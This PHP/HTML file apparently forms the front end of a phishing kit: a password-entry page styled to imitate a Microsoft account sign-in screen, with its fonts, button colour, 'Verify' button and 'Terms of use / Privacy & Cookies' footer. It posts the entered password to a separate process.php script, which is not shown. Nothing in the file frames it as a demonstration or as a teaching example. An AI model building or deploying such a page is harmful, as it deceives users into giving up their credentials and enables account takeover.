<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Sign in to your account</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            font-family: "Segoe UI Webfont", sans-serif;
            font-size: 15px;
            line-height: 1.25rem;
            background: url() no-repeat fixed center;
            background-size: cover;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .sign-in-box {
            width: 90%;
            max-width: 400px;
            padding: 44px;
            background-color: #fff;
            box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
            min-width: 300px;
            min-height: 300px;
            text-align: left;
            position: relative;
        }

        .logo {
            margin-bottom: 10px;
            text-align: left; /* Logo aligned left */
        }

        .logo img {
            height: 40px;
            max-width: 100%;
        }

        .prompt {
            color: #1b1b1b;
            font-size: 1.5rem;
            font-weight: 600;
            margin-top: 16px;
            margin-bottom: 15px;
        }

        .error-message {
            color: red;
            <?php if (!isset($_POST['passwd']) || empty($_POST['passwd'])) echo 'display: block;'; else echo 'display: none;'; ?>
        }

        /* Password input styled as a single line */
        .passwordinput {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: none;
            border-bottom: 2px solid black;
            outline: none;
            font-size: 1rem;
            background: transparent;
        }

        .buttoncontainer {
            text-align: right;
        }

        .button {
            color: #fff;
            background-color: #0067b8;
            width: 80px;
            padding: 8px;
            border: none;
            font-size: 1rem;
            cursor: pointer;
        }

        .button:hover {
            background-color: #0055a6;
        }

        .footer {
            background-color: rgba(20, 20, 20, 0.6);
            position: fixed;
            bottom: 0;
            height: 28px;
            width: 100vw;
            text-align: center;
            color: white;
            font-size: 12px;
            line-height: 28px;
        }
    </style>
</head>
<body>

<div class="sign-in-box">
    <div class="logo">
        <img src="logo.jpg" alt="Logo">
    </div>

    <div class="prompt">Enter password</div>

    <div class="error-message">
        <?php
        if ($_SERVER["REQUEST_METHOD"] == "POST") {
            if (empty($_POST['passwd'])) {
                echo "Please enter your password.";
            }
        }
        ?>
    </div>

    <form action="process.php" method="POST">
        <input class="passwordinput" type="password" name="passwd" id="password" placeholder="Password" required>
        <div class="buttoncontainer">
            <button type="submit" class="button">Verify</button>
        </div>
    </form>
</div>

<div class="footer">
    Terms of use <span style="margin-left: 20px;"></span> Privacy & Cookies
</div>

</body>
</html>
